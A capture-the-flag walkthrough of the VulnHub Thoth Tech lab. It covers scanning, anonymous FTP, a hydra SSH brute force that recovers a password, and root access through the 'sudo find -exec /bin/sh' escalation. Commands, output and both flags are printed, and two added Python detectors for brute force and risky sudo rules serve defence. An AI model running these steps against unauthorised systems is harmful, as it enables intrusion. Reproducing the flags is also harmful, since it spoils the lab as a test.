Disclaimer: This article records the solving process for the Thoth Tech: 1 penetration-testing target machine; all operations were carried out in a local, authorized environment. The content is intended solely for cybersecurity learning and defensive research and must not be used for any illegal purpose. Readers should comply with the Cybersecurity Law and related laws and regulations, and take responsibility for protecting cyberspace security.
Objectives:
1. Obtain the user flag
2. Obtain the root flag
Environment:
https://download.vulnhub.com/thothtech/Thoth-Tech.ova
I. Information Gathering
1. Discover the target IP address
arp-scan -l # discover all live IP addresses on the current subnet
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:e0:71:d3 PCS Systemtechnik GmbH
192.168.5.12 08:00:27:1b:a5:e6 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.118 seconds (120.87 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 06:24 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.12
Host is up (0.00016s latency).
MAC Address: 08:00:27:1B:A5:E6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.79 seconds
Target IP: 192.168.5.12
2. Scan the target for open ports
nmap -sV -p- 192.168.5.12
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 06:25 -0400
Nmap scan report for 192.168.5.12
Host is up (0.000097s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:1B:A5:E6 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
Open ports: 21, 22, 80
3. Directory enumeration
dirsearch -u http://192.168.5.12
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.12
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.5.12/_26-03-11_06-26-54.txt
Target: http://192.168.5.12/
[06:26:54] Starting:
[06:26:55] 403 - 277B - /.ht_wsr.txt
[06:26:55] 403 - 277B - /.htaccess.bak1
[06:26:55] 403 - 277B - /.htaccess.orig
[06:26:55] 403 - 277B - /.htaccess.sample
[06:26:55] 403 - 277B - /.htaccess.save
[06:26:55] 403 - 277B - /.htaccess_extra
[06:26:55] 403 - 277B - /.htaccess_orig
[06:26:55] 403 - 277B - /.htaccess_sc
[06:26:55] 403 - 277B - /.htaccessBAK
[06:26:55] 403 - 277B - /.htaccessOLD
[06:26:55] 403 - 277B - /.htaccessOLD2
[06:26:55] 403 - 277B - /.htm
[06:26:55] 403 - 277B - /.html
[06:26:55] 403 - 277B - /.htpasswd_test
[06:26:55] 403 - 277B - /.htpasswds
[06:26:55] 403 - 277B - /.httr-oauth
[06:26:56] 403 - 277B - /.php
[06:27:22] 403 - 277B - /server-status/
[06:27:22] 403 - 277B - /server-status
[06:27:25] 200 - 7B - /test.php
[06:27:30] 200 - 2KB - /wordpress/wp-login.php
[06:27:30] 301 - 0B - /wordpress/ -> http://192.168.1.8/wordpress/
Task Completed
dirb http://192.168.5.12
┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 11 06:28:05 2026
URL_BASE: http://192.168.5.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.12/ ----
+ http://192.168.5.12/index.html (CODE:200|SIZE:10918)
+ http://192.168.5.12/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.5.12/wordpress/
---- Entering directory: http://192.168.5.12/wordpress/ ----
+ http://192.168.5.12/wordpress/index.php (CODE:200|SIZE:19705)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-includes/
+ http://192.168.5.12/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/ ----
+ http://192.168.5.12/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/includes/
+ http://192.168.5.12/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/user/
---- Entering directory: http://192.168.5.12/wordpress/wp-content/ ----
+ http://192.168.5.12/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.5.12/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/network/ ----
+ http://192.168.5.12/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.12/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/user/ ----
+ http://192.168.5.12/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.12/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/plugins/ ----
+ http://192.168.5.12/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/themes/ ----
+ http://192.168.5.12/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Mar 11 06:28:15 2026
DOWNLOADED: 36896 - FOUND: 13
gobuster dir -u http://192.168.5.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.12
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 316] [--> http://192.168.5.12/wordpress/]
/test.php (Status: 200) [Size: 7]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
II. Exploitation
1. Access the FTP service
ftp 192.168.5.12
User: anonymous
ls
get note.txt
exit
cat note.txt
┌──(root㉿kali)-[~]
└─# ftp 192.168.5.12
Connected to 192.168.5.12.
220 (vsFTPd 3.0.3)
Name (192.168.5.12:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12986|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 110 Jul 02 2021 note.txt
226 Directory send OK.
ftp>
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||24173|)
150 Opening BINARY mode data connection for note.txt (110 bytes).
100% |*******************************************| 110 70.57 KiB/s 00:00 ETA
226 Transfer complete.
110 bytes received in 00:00 (58.60 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~]
└─# cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
From the note we infer that an account named pwnlab exists and that its password is weak.
2. SSH
a. Password cracking
hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.5.12
┌──(root㉿kali)-[~]
└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.5.12
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-11 06:34:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.5.12:22/
[22][ssh] host: 192.168.5.12 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-11 06:35:02
The account password was recovered: babygirl1.
b. SSH login
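From the server's side, the hydra run above is a burst of failed password logins from one source followed by a successful one. The following added example (not part of the original write-up) shows the detection logic over constructed sshd auth.log lines in standard OpenSSH syslog format; the host name, PIDs, ports and the second host 192.168.5.2 are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in standard OpenSSH syslog format (not captured from the target):
# a short password-guessing burst against pwnlab that ends in a successful login,
# followed by unrelated, benign activity from another host.
SAMPLE_AUTH_LOG = """\
Mar 11 06:34:08 thothtech sshd[1201]: Failed password for pwnlab from 192.168.5.11 port 40122 ssh2
Mar 11 06:34:09 thothtech sshd[1203]: Failed password for pwnlab from 192.168.5.11 port 40124 ssh2
Mar 11 06:34:09 thothtech sshd[1205]: Failed password for invalid user admin from 192.168.5.11 port 40126 ssh2
Mar 11 06:34:10 thothtech sshd[1207]: Failed password for pwnlab from 192.168.5.11 port 40128 ssh2
Mar 11 06:34:12 thothtech sshd[1209]: Failed password for pwnlab from 192.168.5.11 port 40130 ssh2
Mar 11 06:35:02 thothtech sshd[1290]: Accepted password for pwnlab from 192.168.5.11 port 40210 ssh2
Mar 11 07:10:44 thothtech sshd[1402]: Failed password for jake from 192.168.5.2 port 51000 ssh2
Mar 11 07:11:30 thothtech sshd[1410]: Accepted publickey for jake from 192.168.5.2 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def detect_ssh_brute_force(log_text, threshold=5, window_seconds=60):
    """Return alerts as (kind, source_ip, user) tuples.
    'brute_force': a source IP produced `threshold` failed logins inside a
                   sliding window of `window_seconds` (raised once per IP).
    'success_after_brute_force': a flagged IP later authenticated successfully,
                   which is what the hydra run looks like on the server."""
    failures = defaultdict(list)     # source ip -> recent failure timestamps
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")   # syslog carries no year
        ip = m["ip"]
        if m["result"] == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute_force", ip, m["user"]))
        elif ip in flagged:
            alerts.append(("success_after_brute_force", ip, m["user"]))
    return alerts
```

A real hydra run produces far more than five failures per minute, so the default threshold is deliberately low; the second alert kind is the one worth paging on.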
ssh pwnlab@192.168.5.12
Password: babygirl1
┌──(root㉿kali)-[~]
└─# ssh pwnlab@192.168.5.12
The authenticity of host '192.168.5.12 (192.168.5.12)' can't be established.
ED25519 key fingerprint is: SHA256:92r1ZGJ7wYMcpzTK4CtNCLO1ib7UJVa+pSM1K3y/guc
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.12' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
pwnlab@192.168.5.12's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 11 Mar 2026 10:35:19 AM UTC
System load: 0.01 Processes: 123
Usage of /: 24.8% of 19.56GB Users logged in: 0
Memory usage: 26% IPv4 address for enp0s3: 192.168.5.12
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jul 2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$
Obtain the user flag
pwnlab@thothtech:~$ ls
user.txt
pwnlab@thothtech:~$
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
pwnlab@thothtech:~$
III. Privilege Escalation
1. Check whether the current account can run any privileged commands
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$
2. Escalate privileges
sudo find . -exec /bin/sh \; -quit
pwnlab@thothtech:~$ sudo find . -exec /bin/sh \; -quit
#
#
#
# id
uid=0(root) gid=0(root) groups=0(root)
#
# whoami
root
#
# cd /root
#
# ls
root.txt snap
#
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job :)
#
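The root cause here is a sudoers rule that grants a shell-capable binary (find, via -exec) to root without a password. The following added example (not part of the original write-up) audits `sudo -l` output for such rules, using the exact output captured above plus a constructed comparison sample; the host web01, user ops and the two rules in that sample are assumptions, and the set of flagged binaries is a deliberately small baseline to extend.

```python
import re

# Exact `sudo -l` output captured on the target in the walkthrough above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
"""

# Constructed comparison sample (not from the target): one tight rule, one wildcard rule.
SAMPLE_OK = """\
User ops may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (root) /usr/bin/apt-get install *
"""

# Binaries whose documented features run other programs (find -exec, the shells).
# Extend with the interpreters and editors present on your own baseline.
SHELL_CAPABLE = {"find", "sh", "bash", "dash"}

# (runas) [TAG: TAG: ...] command[, command ...]
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output):
    """Return (runas, command, reason) for every rule that lets the user reach
    arbitrary command execution: ALL, a shell-capable binary (worse when
    NOPASSWD), or a wildcard in the argument list."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        runas = m["runas"].split(":")[0].strip()
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "ALL"
            elif name in SHELL_CAPABLE:
                reason = "SHELL_CAPABLE_NOPASSWD" if "NOPASSWD" in tags else "SHELL_CAPABLE"
            elif "*" in cmd:
                reason = "WILDCARD"
            else:
                continue
            findings.append((runas, cmd, reason))
    return findings
```

The fix for the finding on this machine is to remove the rule or replace it with a wrapper script that runs the specific find invocation the user actually needs.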
user:
5ec2a44a73e7b259c6b0abc174291359
root:
d51546d5bcf8e3856c7bff5d201f0df6